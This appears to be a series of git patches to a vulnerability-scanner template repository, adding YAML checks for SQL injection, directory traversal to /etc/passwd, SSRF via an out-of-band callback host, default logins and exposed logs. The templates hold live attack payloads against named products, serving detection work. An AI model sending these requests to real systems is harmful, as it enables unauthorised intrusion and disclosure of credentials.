suffers from an unauthenticated SQL Injection vulnerability. Input passed through 'input_id' POST parameter in '/http/index.php' is not properly sanitised before being returned to the user or used in SQL queries. - reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5655.php + reference: | + - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5655.php + - https://www.exploit-db.com/exploits/50146 + - https://packetstormsecurity.com/files/163572/ tags: kevinlab,sqli requests: From 9a46592f714d5fed6424931de12da048334e8865 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sat, 24 Jul 2021 11:59:35 +0530 Subject: [PATCH 1096/4083] Update kevinlab-bems-sqli.yaml --- vulnerabilities/other/kevinlab-bems-sqli.yaml | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/vulnerabilities/other/kevinlab-bems-sqli.yaml b/vulnerabilities/other/kevinlab-bems-sqli.yaml index 781f8eb9a3..e4a4a8fcc4 100644 --- a/vulnerabilities/other/kevinlab-bems-sqli.yaml +++ b/vulnerabilities/other/kevinlab-bems-sqli.yaml @@ -25,7 +25,12 @@ requests: requester=login&request=login¶ms=[{"name":"input_id","value":"USERNAME' AND EXTRACTVALUE(1337,CONCAT(0x5C,0x5A534C,(SELECT (ELT(1337=1337,1))),0x5A534C)) AND 'joxy'='joxy"},{"name":"input_passwd","value":"PASSWORD"},{"name":"device_id","value":"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx"},{"name":"checked","value":false},{"name":"login_key","value":""}] + matchers-condition: and matchers: - type: word words: - "XPATH syntax error" + - ": '\\ZSL1ZSL'" + - type: status + status: + - 200 From 2631f55550f1d7e37d1b89b23d8eecdffb905ba8 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sat, 24 Jul 2021 12:07:27 +0530 Subject: [PATCH 1097/4083] Update kevinlab-bems-backdoor.yaml --- vulnerabilities/other/kevinlab-bems-backdoor.yaml | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/vulnerabilities/other/kevinlab-bems-backdoor.yaml b/vulnerabilities/other/kevinlab-bems-backdoor.yaml index e2abcec244..54619b0ce4 100644 --- a/vulnerabilities/other/kevinlab-bems-backdoor.yaml +++ b/vulnerabilities/other/kevinlab-bems-backdoor.yaml @@ -31,6 +31,11 @@ requests: part: body condition: or + - type: word + words: + - '"result":true' + part: body + - type: status status: - 200 From ac45802ef5fce60fa719eadcaf6fedd30d2307f0 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sat, 24 Jul 2021 12:10:46 +0530 Subject: [PATCH 1098/4083] Update kevinlab-bems-sqli.yaml --- vulnerabilities/other/kevinlab-bems-sqli.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/vulnerabilities/other/kevinlab-bems-sqli.yaml b/vulnerabilities/other/kevinlab-bems-sqli.yaml index e4a4a8fcc4..6d35885dfc 100644 --- a/vulnerabilities/other/kevinlab-bems-sqli.yaml +++ b/vulnerabilities/other/kevinlab-bems-sqli.yaml @@ -31,6 +31,7 @@ requests: words: - "XPATH syntax error" - ": '\\ZSL1ZSL'" + condition: and - type: status status: - 200 From f40aca136b9a87c0cc7be8a42978e9b11f857862 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sat, 24 Jul 2021 12:15:24 +0530 Subject: [PATCH 1099/4083] Update CVE-2020-29227.yaml --- cves/2020/CVE-2020-29227.yaml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/cves/2020/CVE-2020-29227.yaml b/cves/2020/CVE-2020-29227.yaml index 71196da28b..6c4253cfed 100644 --- a/cves/2020/CVE-2020-29227.yaml +++ b/cves/2020/CVE-2020-29227.yaml @@ -5,7 +5,9 @@ info: author: daffainfo severity: high description: An issue was discovered in Car Rental Management System 1.0. An unauthenticated user can perform a file inclusion attack against the /index.php file with a partial filename in the "page" parameter, to cause local file inclusion resulting in code execution. - reference: https://loopspell.medium.com/cve-2020-29227-unauthenticated-local-file-inclusion-7d3bd2c5c6a5 + reference: | + - https://loopspell.medium.com/cve-2020-29227-unauthenticated-local-file-inclusion-7d3bd2c5c6a5 + - https://nvd.nist.gov/vuln/detail/CVE-2020-29227 tags: cve,cve2020,lfi requests: From 956eb6691fa325323d59e1e6512711979bdfcdae Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sat, 24 Jul 2021 12:16:30 +0530 Subject: [PATCH 1100/4083] Update CVE-2020-29227.yaml --- cves/2020/CVE-2020-29227.yaml | 6 +++++- 1 file changed, 5 insertions(+), 1 deletion(-) diff --git a/cves/2020/CVE-2020-29227.yaml b/cves/2020/CVE-2020-29227.yaml index 6c4253cfed..dd6a918571 100644 --- a/cves/2020/CVE-2020-29227.yaml +++ b/cves/2020/CVE-2020-29227.yaml @@ -14,9 +14,13 @@ requests: - method: GET path: - "{{BaseURL}}/index.php?page=/etc/passwd%00" - + matchers-condition: and matchers: - type: regex regex: - "root:[x*]:0:0:" part: body + matchers: + - type: status + status: + - 200 From af4081d0ec4bcd9e317821d111e1333f94727f54 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sat, 24 Jul 2021 12:17:56 +0530 Subject: [PATCH 1101/4083] Update CVE-2020-29227.yaml --- cves/2020/CVE-2020-29227.yaml | 1 - 1 file changed, 1 deletion(-) diff --git a/cves/2020/CVE-2020-29227.yaml b/cves/2020/CVE-2020-29227.yaml index dd6a918571..0dbfe41285 100644 --- a/cves/2020/CVE-2020-29227.yaml +++ b/cves/2020/CVE-2020-29227.yaml @@ -20,7 +20,6 @@ requests: regex: - "root:[x*]:0:0:" part: body - matchers: - type: status status: - 200 From 5778ee8eda90fba0e32ca2e89e3968d0c31957aa Mon Sep 17 00:00:00 2001 From: GwanYeong Kim Date: Sat, 24 Jul 2021 15:54:02 +0900 Subject: [PATCH 1102/4083] Create targa-camera-lfi.yaml The ANPR camera suffers from an unauthenticated arbitrary file disclosure vulnerability. Input passed through the Download Archive in Storage page using get_file.php script is not properly verified before being used to download files. This can be exploited to disclose the contents of arbitrary and sensitive files via directory traversal attacks and aid the attacker to disclose clear-text credentials resulting in authentication bypass. Signed-off-by: GwanYeong Kim --- vulnerabilities/other/targa-camera-lfi.yaml | 25 +++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 vulnerabilities/other/targa-camera-lfi.yaml diff --git a/vulnerabilities/other/targa-camera-lfi.yaml b/vulnerabilities/other/targa-camera-lfi.yaml new file mode 100644 index 0000000000..e82bd25763 --- /dev/null +++ b/vulnerabilities/other/targa-camera-lfi.yaml @@ -0,0 +1,25 @@ +id: targa-camera-lfi + +info: + name: Selea Targa IP OCR-ANPR Camera - Unauthenticated Directory Traversal + author: gy741 + severity: high + description: The ANPR camera suffers from an unauthenticated arbitrary file disclosure vulnerability. Input passed through the Download Archive in Storage page using get_file.php script is not properly verified before being used to download files. This can be exploited to disclose the contents of arbitrary and sensitive files via directory traversal attacks and aid the attacker to disclose clear-text credentials resulting in authentication bypass. + reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5616.php + tags: targa,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/CFCARD/images/SeleaCamera/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 From aae443949f1f74b19f865bbf72af7b73b065cb41 Mon Sep 17 00:00:00 2001 From: GwanYeong Kim Date: Sat, 24 Jul 2021 16:02:58 +0900 Subject: [PATCH 1103/4083] Create targa-camera-ssrf.yaml Unauthenticated Server-Side Request Forgery (SSRF) vulnerability exists in the Selea ANPR camera within several functionalities. The application parses user supplied data in the POST JSON parameters 'ipnotify_address' and 'url' to construct an image request or check DNS for IP notification. Since no validation is carried out on the parameters, an attacker can specify an external domain and force the application to make an HTTP request to an arbitrary destination host. This can be used by an external attacker for example to bypass firewalls and initiate a service and network enumeration on the internal network through the affected application. Signed-off-by: GwanYeong Kim --- vulnerabilities/other/targa-camera-ssrf.yaml | 29 ++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 vulnerabilities/other/targa-camera-ssrf.yaml diff --git a/vulnerabilities/other/targa-camera-ssrf.yaml b/vulnerabilities/other/targa-camera-ssrf.yaml new file mode 100644 index 0000000000..768d2a92d3 --- /dev/null +++ b/vulnerabilities/other/targa-camera-ssrf.yaml @@ -0,0 +1,29 @@ +id: targa-camera-ssrf + +info: + name: Selea Targa IP OCR-ANPR Camera - Unauthenticated SSRF + author: gy741 + severity: high + description: Unauthenticated Server-Side Request Forgery (SSRF) vulnerability exists in the Selea ANPR camera within several functionalities. The application parses user supplied data in the POST JSON parameters 'ipnotify_address' and 'url' to construct an image request or check DNS for IP notification. Since no validation is carried out on the parameters, an attacker can specify an external domain and force the application to make an HTTP request to an arbitrary destination host. This can be used by an external attacker for example to bypass firewalls and initiate a service and network enumeration on the internal network through the affected application. + reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5617.php + tags: targa,ssrf,oob + +requests: + - raw: + - | + POST /cps/test_backup_server?ACTION=TEST_IP&NOCONTINUE=TRUE HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 + content-type: application/json + Accept: */* + Accept-Encoding: gzip, deflate + Accept-Language: en-US,en;q=0.9 + Connection: close + + {"test_type":"ip","test_debug":false,"ipnotify_type":"http/get","ipnotify_address":"http://{{interactsh-url}}","ipnotify_username":"","ipnotify_password":"","ipnotify_port":"0","ipnotify_content_type":"","ipnotify_template":""} + + matchers: + - type: word + part: interactsh_protocol + words: + - "http" From d151d60cedafe77cc1179b98accb4f0d7dfdc85c Mon Sep 17 00:00:00 2001 From: GwanYeong Kim Date: Sat, 24 Jul 2021 16:38:03 +0900 Subject: [PATCH 1104/4083] Update favicon-detection.yaml Signed-off-by: GwanYeong Kim --- technologies/favicon-detection.yaml | 8 ++++++++ 1 file changed, 8 insertions(+) diff --git a/technologies/favicon-detection.yaml b/technologies/favicon-detection.yaml index 1110dbd233..9ad74f46c2 100644 --- a/technologies/favicon-detection.yaml +++ b/technologies/favicon-detection.yaml @@ -2036,3 +2036,11 @@ requests: name: "SpamSniper" dsl: - "status_code==200 && (\"-1000719429\" == mmh3(base64_py(body)))" + - type: dsl + name: "Selea ANPR Camera" + dsl: + - "status_code==200 && (\"-41369781\" == mmh3(base64_py(body)))" + - type: dsl + name: "Selea CarPlateServer" + dsl: + - "status_code==200 && (\"-656528622\" == mmh3(base64_py(body)))" From 3d90fd1047fb6e3b7dd38a09d79be10fe53bc49c Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Sat, 24 Jul 2021 17:10:02 +0700 Subject: [PATCH 1105/4083] Fix wrong regex matcher --- cves/2021/CVE-2021-23241.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-23241.yaml b/cves/2021/CVE-2021-23241.yaml index 7924ec3b46..8a834ac8d2 100644 --- a/cves/2021/CVE-2021-23241.yaml +++ b/cves/2021/CVE-2021-23241.yaml @@ -19,7 +19,7 @@ requests: matchers: - type: regex regex: - - "root:[0*]:0:0" + - "root:.*:0:0" part: body - type: status From 697b7cf01f8f8cee2646d31a0d7d4846f0d42d59 Mon Sep 17 00:00:00 2001 From: Philippe Delteil Date: Sat, 24 Jul 2021 15:17:07 -0400 Subject: [PATCH 1106/4083] Create redcap-detector.yaml Tests: https://redcap.inca.gov.br/ https://redcap.icb.udec.cl/ https://redcap.cens.cl https://redcap.ufro.cl --- technologies/redcap-detector.yaml | 28 ++++++++++++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 technologies/redcap-detector.yaml diff --git a/technologies/redcap-detector.yaml b/technologies/redcap-detector.yaml new file mode 100644 index 0000000000..b075f7c6df --- /dev/null +++ b/technologies/redcap-detector.yaml @@ -0,0 +1,28 @@ +id: redcap-detector + +info: + name: REDCap detector + author: philippedelteil & retr0 + severity: info + tags: redcap + +requests: + - method: GET + path: + - "{{BaseURL}}" + matcher-condition: and + matchers: + - type: word + words: + - 'REDCap ' + - 'Vanderbilt University' + condition: and + - type: status + status: + - 200 + extractors: + - type: regex + part: body + group: 1 + regex: + - 'REDCap ([0-9-.]+)' From 2893fefd285ba02abd9b01b15fa9f61edb0b79df Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Sat, 24 Jul 2021 14:22:54 -0500 Subject: [PATCH 1107/4083] Create lutron-iot-default-login.yaml --- iot/lutron-iot-default-login.yaml | 28 ++++++++++++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 iot/lutron-iot-default-login.yaml diff --git a/iot/lutron-iot-default-login.yaml b/iot/lutron-iot-default-login.yaml new file mode 100644 index 0000000000..71fd122838 --- /dev/null +++ b/iot/lutron-iot-default-login.yaml @@ -0,0 +1,28 @@ +id: lutron-iot-default-login + +info: + name: Lutron IOT Device Default Login + reference: https://www.lutron.com + author: geeknik + severity: high + +requests: + - method: GET + path: + - "{{BaseURL}}/login?login=lutron&password=lutron" + + matchers-condition: and + matchers: + - type: word + words: + - "LUTRON" + - ">DeviceIP" + - ">Get Database Info as XML" + condition: and + - type: word + part: header + words: + - "text/html" + - type: status + status: + - 200 From a26ded0a06bc45987b9bf1a53597ae3e995ce068 Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Sat, 24 Jul 2021 14:26:30 -0500 Subject: [PATCH 1108/4083] Create pagespeed-global-admin.yaml --- exposed-panels/pagespeed-global-admin.yaml | 30 ++++++++++++++++++++++ 1 file changed, 30 insertions(+) create mode 100644 exposed-panels/pagespeed-global-admin.yaml diff --git a/exposed-panels/pagespeed-global-admin.yaml b/exposed-panels/pagespeed-global-admin.yaml new file mode 100644 index 0000000000..428cdce30a --- /dev/null +++ b/exposed-panels/pagespeed-global-admin.yaml @@ -0,0 +1,30 @@ +id: pagespeed-global-admin + +info: + name: Pagespeed Global Admin + reference: https://www.modpagespeed.com/ + author: geeknik + severity: low + tags: pagespeed + +requests: + - method: GET + headers: + X-Client-IP: "127.0.0.1" + X-Remote-IP: "127.0.0.1" + X-Remote-Addr: "127.0.0.1" + X-Forwarded-For: "127.0.0.1" + X-Originating-IP: "127.0.0.1" + X-Host: "127.0.0.1" + X-Forwarded-Host: "127.0.0.1" + path: + - "{{BaseURL}}/pagespeed-global-admin/" + matchers-condition: and + matchers: + - type: word + words: + - "X-Mod-Pagespeed" + part: header + - type: status + status: + - 200 From e428dc64542ed630c423d0d258a038fcf40b96b1 Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Sat, 24 Jul 2021 14:28:33 -0500 Subject: [PATCH 1109/4083] Create production-logs.yaml --- exposures/logs/production-logs.yaml | 35 +++++++++++++++++++++++++++++ 1 file changed, 35 insertions(+) create mode 100644 exposures/logs/production-logs.yaml diff --git a/exposures/logs/production-logs.yaml b/exposures/logs/production-logs.yaml new file mode 100644 index 0000000000..65db4e120d --- /dev/null +++ b/exposures/logs/production-logs.yaml @@ -0,0 +1,35 @@ +id: production-logs + +info: + name: Discover production log files + author: geeknik + severity: info + +requests: + - method: GET + path: + - "{{BaseURL}}/log/production.log" + - "{{BaseURL}}/logs/production.log" + - "{{BaseURL}}/production.log" + + matchers-condition: and + matchers: + - type: word + words: + - "Connecting to database specified by database.yml" + - "Started GET" + condition: and + - type: word + part: header + words: + - "text/html" + negative: true + - type: status + status: + - 200 + extractors: + - type: regex + name: last_modified + part: header + regex: + - 'Last-Modified:.*' From 7afc39cb32174334b5cbcaf76ad4b060b66fb447 Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Sat, 24 Jul 2021 14:29:43 -0500 Subject: [PATCH 1110/4083] Create development-logs.yaml --- exposures/logs/development-logs.yaml | 40 ++++++++++++++++++++++++++++ 1 file changed, 40 insertions(+) create mode 100644 exposures/logs/development-logs.yaml diff --git a/exposures/logs/development-logs.yaml b/exposures/logs/development-logs.yaml new file mode 100644 index 0000000000..86e44d8654 --- /dev/null +++ b/exposures/logs/development-logs.yaml @@ -0,0 +1,40 @@ +id: development-logs + +info: + name: Discover development log files + author: geeknik + severity: info + +requests: + - method: GET + path: + - "{{BaseURL}}/log/development.log" + - "{{BaseURL}}/logs/development.log" + - "{{BaseURL}}/development.log" + + matchers-condition: and + matchers: + - type: word + words: + - "Connecting to database specified by database.yml" + - "Started GET" + condition: or + - type: word + words: + - "DEPRECATION WARNING" + - "CREATE TABLE" + condition: or + - type: word + part: header + words: + - "text/html" + negative: true + - type: status + status: + - 200 + extractors: + - type: regex + name: last_modified + part: header + regex: + - 'Last-Modified:.*' From 121918945eb5975d038c1d6c4ebd171604575ac7 Mon Sep 17 00:00:00 2001 From: Sandeep Singh Date: Sun, 25 Jul 2021 01:54:18 +0530 Subject: [PATCH 1111/4083] Update redcap-detector.yaml --- technologies/redcap-detector.yaml | 9 ++++++--- 1 file changed, 6 insertions(+), 3 deletions(-) diff --git a/technologies/redcap-detector.yaml b/technologies/redcap-detector.yaml index b075f7c6df..5bfb15764b 100644 --- a/technologies/redcap-detector.yaml +++ b/technologies/redcap-detector.yaml @@ -2,24 +2,27 @@ id: redcap-detector info: name: REDCap detector - author: philippedelteil & retr0 + author: philippedelteil,retr0 severity: info - tags: redcap + tags: redcap,tech requests: - method: GET path: - "{{BaseURL}}" + matcher-condition: and matchers: - type: word words: - - 'REDCap ' + - 'REDCap' - 'Vanderbilt University' condition: and + - type: status status: - 200 + extractors: - type: regex part: body From 6ccc5f8792b4579b03c163e036ae915c5d4699c5 Mon Sep 17 00:00:00 2001 From: sandeep Date: Sun, 25 Jul 2021 03:05:55 +0530 Subject: [PATCH 1112/4083] matcher update to handle edge cases --- cnvd/CNVD-2021-15822.yaml | 2 +- cves/2007/CVE-2007-4556.yaml | 2 +- cves/2008/CVE-2008-2650.yaml | 2 +- cves/2009/CVE-2009-0545.yaml | 2 +- cves/2009/CVE-2009-1151.yaml | 2 +- cves/2009/CVE-2009-1558.yaml | 2 +- cves/2010/CVE-2010-2307.yaml | 2 +- cves/2010/CVE-2010-4231.yaml | 2 +- cves/2011/CVE-2011-0049.yaml | 2 +- cves/2011/CVE-2011-1669.yaml | 2 +- cves/2011/CVE-2011-3315.yaml | 2 +- cves/2012/CVE-2012-0392.yaml | 2 +- cves/2012/CVE-2012-1823.yaml | 2 +- cves/2013/CVE-2013-1965.yaml | 2 +- cves/2013/CVE-2013-5528.yaml | 2 +- cves/2014/CVE-2014-3120.yaml | 2 +- cves/2014/CVE-2014-3744.yaml | 2 +- cves/2014/CVE-2014-6271.yaml | 2 +- cves/2015/CVE-2015-1000012.yaml | 2 +- cves/2015/CVE-2015-1427.yaml | 2 +- cves/2015/CVE-2015-3337.yaml | 2 +- cves/2015/CVE-2015-5688.yaml | 2 +- cves/2015/CVE-2015-9480.yaml | 2 +- cves/2016/CVE-2016-10956.yaml | 2 +- cves/2016/CVE-2016-3081.yaml | 2 +- cves/2017/CVE-2017-10271.yaml | 2 +- cves/2017/CVE-2017-12611.yaml | 2 +- cves/2017/CVE-2017-12615.yaml | 2 +- cves/2017/CVE-2017-14535.yaml | 2 +- cves/2017/CVE-2017-14537.yaml | 2 +- cves/2017/CVE-2017-14849.yaml | 2 +- cves/2017/CVE-2017-16806.yaml | 2 +- cves/2017/CVE-2017-16877.yaml | 2 +- cves/2017/CVE-2017-9791.yaml | 2 +- cves/2018/CVE-2018-11776.yaml | 2 +- cves/2018/CVE-2018-12031.yaml | 2 +- cves/2018/CVE-2018-12613.yaml | 2 +- cves/2018/CVE-2018-1273.yaml | 2 +- cves/2018/CVE-2018-14728.yaml | 2 +- cves/2018/CVE-2018-16059.yaml | 2 +- cves/2018/CVE-2018-16283.yaml | 2 +- cves/2018/CVE-2018-16299.yaml | 2 +- cves/2018/CVE-2018-16763.yaml | 2 +- cves/2018/CVE-2018-16836.yaml | 2 +- cves/2018/CVE-2018-18777.yaml | 2 +- cves/2018/CVE-2018-18778.yaml | 2 +- cves/2018/CVE-2018-3714.yaml | 2 +- cves/2018/CVE-2018-3760.yaml | 2 +- cves/2018/CVE-2018-7422.yaml | 2 +- cves/2018/CVE-2018-7490.yaml | 2 +- cves/2018/CVE-2018-7600.yaml | 2 +- cves/2018/CVE-2018-8033.yaml | 2 +- cves/2019/CVE-2019-11510.yaml | 2 +- cves/2019/CVE-2019-12314.yaml | 2 +- cves/2019/CVE-2019-15107.yaml | 2 +- cves/2019/CVE-2019-16278.yaml | 2 +- cves/2019/CVE-2019-16662.yaml | 2 +- cves/2019/CVE-2019-16920.yaml | 2 +- cves/2019/CVE-2019-17270.yaml | 2 +- cves/2019/CVE-2019-17538.yaml | 2 +- cves/2019/CVE-2019-3799.yaml | 2 +- cves/2019/CVE-2019-5418.yaml | 2 +- cves/2019/CVE-2019-7254.yaml | 2 +- cves/2019/CVE-2019-7256.yaml | 2 +- cves/2019/CVE-2019-8982.yaml | 2 +- cves/2019/CVE-2019-9618.yaml | 2 +- cves/2019/CVE-2019-9670.yaml | 2 +- cves/2020/CVE-2020-11738.yaml | 2 +- cves/2020/CVE-2020-11991.yaml | 2 +- cves/2020/CVE-2020-14864.yaml | 2 +- cves/2020/CVE-2020-14882.yaml | 2 +- cves/2020/CVE-2020-14883.yaml | 2 +- cves/2020/CVE-2020-15227.yaml | 2 +- cves/2020/CVE-2020-15568.yaml | 2 +- cves/2020/CVE-2020-15920.yaml | 2 +- cves/2020/CVE-2020-17496.yaml | 2 +- cves/2020/CVE-2020-17519.yaml | 2 +- cves/2020/CVE-2020-17530.yaml | 2 +- cves/2020/CVE-2020-21224.yaml | 2 +- cves/2020/CVE-2020-24579.yaml | 2 +- cves/2020/CVE-2020-25540.yaml | 2 +- cves/2020/CVE-2020-26073.yaml | 2 +- cves/2020/CVE-2020-29227.yaml | 2 +- cves/2020/CVE-2020-35736.yaml | 2 +- cves/2020/CVE-2020-5405.yaml | 2 +- cves/2020/CVE-2020-5410.yaml | 2 +- cves/2020/CVE-2020-5902.yaml | 2 +- cves/2020/CVE-2020-7209.yaml | 2 +- cves/2020/CVE-2020-8163.yaml | 2 +- cves/2020/CVE-2020-8193.yaml | 2 +- cves/2020/CVE-2020-8209.yaml | 2 +- cves/2020/CVE-2020-8515.yaml | 2 +- cves/2020/CVE-2020-9054.yaml | 2 +- cves/2021/CVE-2021-21234.yaml | 2 +- cves/2021/CVE-2021-25646.yaml | 2 +- cves/2021/CVE-2021-28149.yaml | 2 +- cves/2021/CVE-2021-3223.yaml | 2 +- cves/2021/CVE-2021-32820.yaml | 2 +- cves/2021/CVE-2021-33564.yaml | 2 +- fuzzing/arbitrary-file-read.yaml | 2 +- fuzzing/directory-traversal.yaml | 2 +- fuzzing/generic-lfi-fuzzing.yaml | 2 +- fuzzing/header-command-injection.yaml | 2 +- misconfiguration/d-link-arbitary-fileread.yaml | 2 +- vulnerabilities/apache/apache-solr-file-read.yaml | 2 +- vulnerabilities/ibm/ibm-infoprint-directory-traversal.yaml | 2 +- vulnerabilities/moodle/moodle-filter-jmol-lfi.yaml | 2 +- vulnerabilities/oracle/oracle-ebs-bispgraph-file-access.yaml | 2 +- vulnerabilities/oscommerce/oscommerce-rce.yaml | 2 +- vulnerabilities/other/eyou-email-rce.yaml | 2 +- vulnerabilities/other/flir-path-traversal.yaml | 2 +- vulnerabilities/other/h3c-imc-rce.yaml | 2 +- vulnerabilities/other/hiboss-rce.yaml | 2 +- vulnerabilities/other/hjtcloud-arbitrary-file-read.yaml | 2 +- vulnerabilities/other/huawei-hg659-lfi.yaml | 2 +- vulnerabilities/other/huijietong-cloud-fileread.yaml | 2 +- vulnerabilities/other/interlib-fileread.yaml | 2 +- vulnerabilities/other/jeewms-lfi.yaml | 2 +- vulnerabilities/other/landray-oa-fileread.yaml | 2 +- vulnerabilities/other/magicflow-lfi.yaml | 2 +- vulnerabilities/other/mpsec-lfi.yaml | 2 +- vulnerabilities/other/myucms-lfr.yaml | 2 +- .../other/nginx-merge-slashes-path-traversal.yaml | 2 +- vulnerabilities/other/ns-asg-file-read.yaml | 2 +- vulnerabilities/other/pdf-signer-ssti-to-rce.yaml | 2 +- .../other/qi-anxin-netkang-next-generation-firewall-rce.yaml | 2 +- vulnerabilities/other/rce-shellshock-user-agent.yaml | 2 +- vulnerabilities/other/ruijie-networks-rce.yaml | 2 +- vulnerabilities/other/sangfor-edr-rce.yaml | 2 +- vulnerabilities/other/simple-employee-rce.yaml | 2 +- vulnerabilities/other/sonicwall-sslvpn-shellshock.yaml | 2 +- vulnerabilities/other/tamronos-rce.yaml | 2 +- vulnerabilities/other/yapi-rce.yaml | 2 +- vulnerabilities/samsung/samsung-wlan-ap-lfi.yaml | 4 ++-- vulnerabilities/samsung/samsung-wlan-ap-rce.yaml | 5 +++-- vulnerabilities/thinkcmf/thinkcmf-lfi.yaml | 2 +- vulnerabilities/wordpress/wordpress-wordfence-lfi.yaml | 2 +- vulnerabilities/wordpress/wp-simple-fields-lfi.yaml | 2 +- vulnerabilities/wordpress/wp-tutor-lfi.yaml | 2 +- vulnerabilities/wordpress/wp-vault-lfi.yaml | 2 +- 140 files changed, 143 insertions(+), 142 deletions(-) diff --git a/cnvd/CNVD-2021-15822.yaml b/cnvd/CNVD-2021-15822.yaml index 2f90f49d59..b41d42c850 100644 --- a/cnvd/CNVD-2021-15822.yaml +++ b/cnvd/CNVD-2021-15822.yaml @@ -20,7 +20,7 @@ requests: - type: regex regex: - - "root:[x*]:0:0" + - "root:.*:0:0" - type: status status: diff --git a/cves/2007/CVE-2007-4556.yaml b/cves/2007/CVE-2007-4556.yaml index ad4d9e3320..61b24bab2c 100644 --- a/cves/2007/CVE-2007-4556.yaml +++ b/cves/2007/CVE-2007-4556.yaml @@ -22,7 +22,7 @@ requests: - type: regex regex: - - "root:[x*]:0:0" + - "root:.*:0:0" part: body - type: status diff --git a/cves/2008/CVE-2008-2650.yaml b/cves/2008/CVE-2008-2650.yaml index 80f9e4ff6e..56d8f91191 100644 --- a/cves/2008/CVE-2008-2650.yaml +++ b/cves/2008/CVE-2008-2650.yaml @@ -21,5 +21,5 @@ requests: - 200 - type: regex regex: - - "root:[x*]:0:0:" + - "root:.*:0:0:" part: body diff --git a/cves/2009/CVE-2009-0545.yaml b/cves/2009/CVE-2009-0545.yaml index 7f00ae437c..640fdf985f 100644 --- a/cves/2009/CVE-2009-0545.yaml +++ b/cves/2009/CVE-2009-0545.yaml @@ -17,4 +17,4 @@ requests: - type: regex part: body regex: - - "root:[x*]:0:0:" + - "root:.*:0:0:" diff --git a/cves/2009/CVE-2009-1151.yaml b/cves/2009/CVE-2009-1151.yaml index 319fbfefc2..c4ea42dfa4 100644 --- a/cves/2009/CVE-2009-1151.yaml +++ b/cves/2009/CVE-2009-1151.yaml @@ -32,4 +32,4 @@ requests: - type: regex regex: - - "root:[x*]:0:0:" \ No newline at end of file + - "root:.*:0:0:" \ No newline at end of file diff --git a/cves/2009/CVE-2009-1558.yaml b/cves/2009/CVE-2009-1558.yaml index f56848b401..9141371d04 100644 --- a/cves/2009/CVE-2009-1558.yaml +++ b/cves/2009/CVE-2009-1558.yaml @@ -17,7 +17,7 @@ requests: matchers: - type: regex regex: - - "root:[x*]:0:0" + - "root:.*:0:0" - type: status status: diff --git a/cves/2010/CVE-2010-2307.yaml b/cves/2010/CVE-2010-2307.yaml index 22129fc120..18fea134a4 100644 --- a/cves/2010/CVE-2010-2307.yaml +++ b/cves/2010/CVE-2010-2307.yaml @@ -19,7 +19,7 @@ requests: matchers: - type: regex regex: - - "root:[x*]:0:0" + - "root:.*:0:0" - type: status status: diff --git a/cves/2010/CVE-2010-4231.yaml b/cves/2010/CVE-2010-4231.yaml index 0a0c3a1ac7..bd05d69769 100644 --- a/cves/2010/CVE-2010-4231.yaml +++ b/cves/2010/CVE-2010-4231.yaml @@ -19,7 +19,7 @@ requests: matchers: - type: regex regex: - - "root:[x*]:0:0" + - "root:.*:0:0" - type: status status: diff --git a/cves/2011/CVE-2011-0049.yaml b/cves/2011/CVE-2011-0049.yaml index e5589d8f5c..32717bd82c 100644 --- a/cves/2011/CVE-2011-0049.yaml +++ b/cves/2011/CVE-2011-0049.yaml @@ -21,7 +21,7 @@ requests: - type: regex regex: - - "root:[x*]:0:0" + - "root:.*:0:0" condition: and - type: status diff --git a/cves/2011/CVE-2011-1669.yaml b/cves/2011/CVE-2011-1669.yaml index 1a448f5a9a..c7f635c034 100644 --- a/cves/2011/CVE-2011-1669.yaml +++ b/cves/2011/CVE-2011-1669.yaml @@ -20,7 +20,7 @@ requests: - type: regex regex: - - "root:[x*]:0:0" + - "root:.*:0:0" - type: status status: diff --git a/cves/2011/CVE-2011-3315.yaml b/cves/2011/CVE-2011-3315.yaml index 0c38a6365b..855379ffba 100644 --- a/cves/2011/CVE-2011-3315.yaml +++ b/cves/2011/CVE-2011-3315.yaml @@ -18,7 +18,7 @@ requests: - type: regex regex: - - "root:[x*]:0:0" + - "root:.*:0:0" - type: status status: diff --git a/cves/2012/CVE-2012-0392.yaml b/cves/2012/CVE-2012-0392.yaml index a0318c0e9d..011cc75b69 100644 --- a/cves/2012/CVE-2012-0392.yaml +++ b/cves/2012/CVE-2012-0392.yaml @@ -18,7 +18,7 @@ requests: - type: regex regex: - - "root:[x*]:0:0" + - "root:.*:0:0" - type: status status: diff --git a/cves/2012/CVE-2012-1823.yaml b/cves/2012/CVE-2012-1823.yaml index 